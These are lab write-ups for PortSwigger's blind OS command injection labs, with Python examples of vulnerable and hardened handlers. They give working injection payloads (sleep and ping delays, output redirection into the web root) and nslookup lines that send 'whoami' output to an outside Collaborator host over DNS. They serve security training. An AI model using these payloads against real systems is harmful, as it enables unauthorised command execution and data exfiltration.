portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups

Detailed, categorized solutions for every lab, from APPRENTICE to EXPERT, covering all 30 vulnerability types.


Labs Covered

This write-up focuses on the following PRACTITIONER-level labs from the PortSwigger Web Security Academy:

2 Blind OS command injection with time delays

This lab demonstrates how an attacker can use time-based techniques to detect the success of command injection when no output is returned to the browser.

3 Blind OS command injection with output redirection

This lab shows how attackers can redirect command output to a location they can retrieve later, enabling them to exfiltrate data even if no output is returned in the HTTP response.

4 Blind OS command injection with out-of-band interaction

This lab demonstrates how attackers can use out-of-band channels, such as DNS queries, to receive feedback about whether command injection was successful.

5 Blind OS command injection with out-of-band data exfiltration

This lab builds on out-of-band interaction by showing how attackers can exfiltrate actual data through external DNS queries or other protocols.

LAB 2 - Blind OS command injection with time delays

Lab Description :

image

Solution :

There is a function to submit feedback:

image

First, check whether any of the feedback parameters (name, email, subject, message) is vulnerable to non-blind command injection, using payloads such as:

|whoami
&whoami

These payloads do not work here: the application returns no command output in the response, so a non-blind test cannot confirm execution.

Next, test the same parameters for blind OS command injection with a payload that causes a measurable delay:

||ping -c 10 127.0.0.1||

or

"; ping -c 10 127.0.0.1; echo "a

Ten ICMP echo requests to localhost take roughly 10 seconds, so a delayed response shows the command ran even though nothing is echoed back. The vulnerability affects the fields "Name", "Email" and "Message"; the email parameter is used in the request below:

image

Appending ` & sleep 10 #` (note the space before & and that # is the last character) or ` & sleep 10 &` to the email parameter, URL-encoded before sending, delays the response by 10 seconds, which shows that the email parameter is vulnerable to command injection.

The # comments out the remainder of the command line, since the injected string is interpreted by a shell; the trailing-& variant achieves the same by backgrounding whatever the application appends. Take the measurement more than once: a single slow response can be ordinary latency, but a consistent 10-second delay that disappears when the sleep is removed cannot.

REQUEST

image

RESPONSE

image
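The time-delay oracle used above, as an added example (this is not the lab's code nor the writeup's): a constructed stand-in for the feedback handler with the same concatenation bug, its hardened counterpart, and a probe that times benign requests against injected ones. The placeholder address x@example.com, the `echo` command standing in for the lab's mail step, and the 0.8 acceptance threshold are assumptions.

```python
import subprocess
import time


def vulnerable_feedback(email: str) -> None:
    """Constructed stand-in for the lab's feedback handler (not the lab's code):
    the user-controlled field is concatenated into a shell command line."""
    subprocess.run(f"echo {email}", shell=True, stdout=subprocess.DEVNULL, check=False)


def hardened_feedback(email: str) -> None:
    """Same operation with an argument vector and no shell: '&', ';', '#' and
    the rest are now just bytes inside one argv element."""
    subprocess.run(["echo", email], stdout=subprocess.DEVNULL, check=False)


def time_delay_payload(seconds: int) -> str:
    """Same shape as the lab payload: '&' ends the original command, 'sleep' runs
    in the foreground, '#' comments out whatever the application appends."""
    return f"x@example.com & sleep {seconds} #"


def probe(handler, seconds: int = 10, samples: int = 3) -> dict:
    """Time-delay oracle: compare the slowest benign request against the fastest
    injected one, so ordinary latency jitter cannot produce a false positive."""

    def elapsed(value: str) -> float:
        start = time.monotonic()
        handler(value)
        return time.monotonic() - start

    baseline = max(elapsed("x@example.com") for _ in range(samples))
    injected = min(elapsed(time_delay_payload(seconds)) for _ in range(samples))
    # Require most of the requested delay to show up (0.8 is an assumed margin);
    # a bare "slower than baseline" test trips too easily on a loaded target.
    return {
        "baseline_s": round(baseline, 3),
        "injected_s": round(injected, 3),
        "vulnerable": injected - baseline >= 0.8 * seconds,
    }


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_feedback), ("hardened", hardened_feedback)):
        print(name, probe(handler, seconds=2))
```

Against a real target, `handler` would be a function that submits the feedback form over HTTP and returns when the response arrives; the decision logic stays the same. Using the slowest baseline sample and the fastest injected sample is what keeps a one-off slow response from being reported as a finding.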


LAB 3 - Blind OS command injection with output redirection

Lab Description :

image

Solution :

There is a functionality for submitting feedback:

image

Product images are retrieved with a GET request to /image?filename=..., which reads files from the /var/www/images directory:

image

We need to execute a command that writes its output into that directory, so the result can be fetched back through the image endpoint:

whoami > /var/www/images/whoami

I sent the POST request to Intruder and set three of the four fields as payload positions in Sniper mode (the email parameter was left out at this stage):

image

Then I added 3 payloads:

image

When payloads are placed in the subject field, the website returns an error:

image

To test output redirection in the email parameter, which was left out of the Intruder attack, inject whoami > /var/www/images/whoami into it behind a shell separator (for example & ... &, URL-encoded as in the previous lab). The 200 OK on the feedback request only shows that the request was accepted; it says nothing about whether the command ran. Confirmation comes from fetching the file.

image

Access the file

We get the username “peter-5fYwD0” after a GET to “/image?filename=whoami”, so the above payload has worked:

image

Response

image
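The redirect-then-fetch procedure, as an added example (not the lab's or the writeup's code): a temporary directory stands in for /var/www/images, a constructed handler has the same concatenation bug as the lab, and serve_image stands in for GET /image?filename=. The file name output.txt, the placeholder address, the `echo` stand-in for the mail step and the temporary directory are assumptions.

```python
import os
import subprocess
import tempfile

# Constructed stand-in for the lab's /var/www/images directory, the web-served
# location the lab confirms is writable by the account the shell runs as.
IMAGE_DIR = tempfile.mkdtemp(prefix="images-")


def vulnerable_feedback(email: str) -> None:
    """Constructed stand-in for the lab's feedback handler (not the lab's code):
    the field is pasted into a shell command line."""
    subprocess.run(f"echo {email}", shell=True, stdout=subprocess.DEVNULL, check=False)


def serve_image(filename: str) -> bytes:
    """Stand-in for GET /image?filename=...: returns a file from the images directory."""
    with open(os.path.join(IMAGE_DIR, filename), "rb") as fh:
        return fh.read()


def redirect_payload(command: str, filename: str, image_dir: str = IMAGE_DIR) -> str:
    """'&' terminates the application's own command, the injected command writes
    its output into the web root, '#' discards whatever the application appends."""
    return f"x@example.com & {command} > {image_dir}/{filename} #"


def exfil_via_redirect(command: str, filename: str = "output.txt") -> str:
    """Submit the payload, then fetch the file back. The submit step proves nothing
    (it returns normally either way); only the second request confirms execution."""
    vulnerable_feedback(redirect_payload(command, filename))
    try:
        return serve_image(filename).decode(errors="replace").strip()
    except FileNotFoundError:
        # File never appeared: no execution, unwritable path, or wrong directory.
        return ""


if __name__ == "__main__":
    print(redirect_payload("whoami", "whoami", "/var/www/images"))
    print("shell runs as uid", exfil_via_redirect("id -u"))
```

The empty-string return on a missing file is the honest outcome of this technique: a payload that is accepted but whose file never shows up tells you only that one of the three conditions (execution, writable directory, correct path) failed, not which.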


LAB 4 - Blind OS command injection with out-of-band interaction

Lab Description :

image

Overview

image

Solution :

There is a function to submit feedback:

image

In this case command injection is confirmed with the payload below, injected into a vulnerable feedback field. The hostname is a Burp Collaborator domain; each Collaborator session has its own oastify.com subdomain, so substitute yours:

nslookup 7s0qd0oqa0r71b9pewc0nu7a41asynmc.oastify.com

image

The DNS interaction appears in the Burp Collaborator client:

image


LAB 5 - Blind OS command injection with out-of-band data exfiltration

Lab Description :

image

Solution :

There is a function to submit feedback. Out-of-band interaction is confirmed with the payload:

$(nslookup juh2fcq2cctj3nb1g8ecp69m6dc400op.oastify.com)

We get the username ("peter-0B6BNY") with the payload below: the inner command substitution runs whoami, and its output becomes the leftmost label of the name that nslookup resolves, so it shows up in the Collaborator DNS query:

$(nslookup $(whoami).m1o5mfx5jf0maqi4nblfw9gpdgj774vt.oastify.com)

image

The DNS query received by Burp Collaborator carries the username as its first label:

image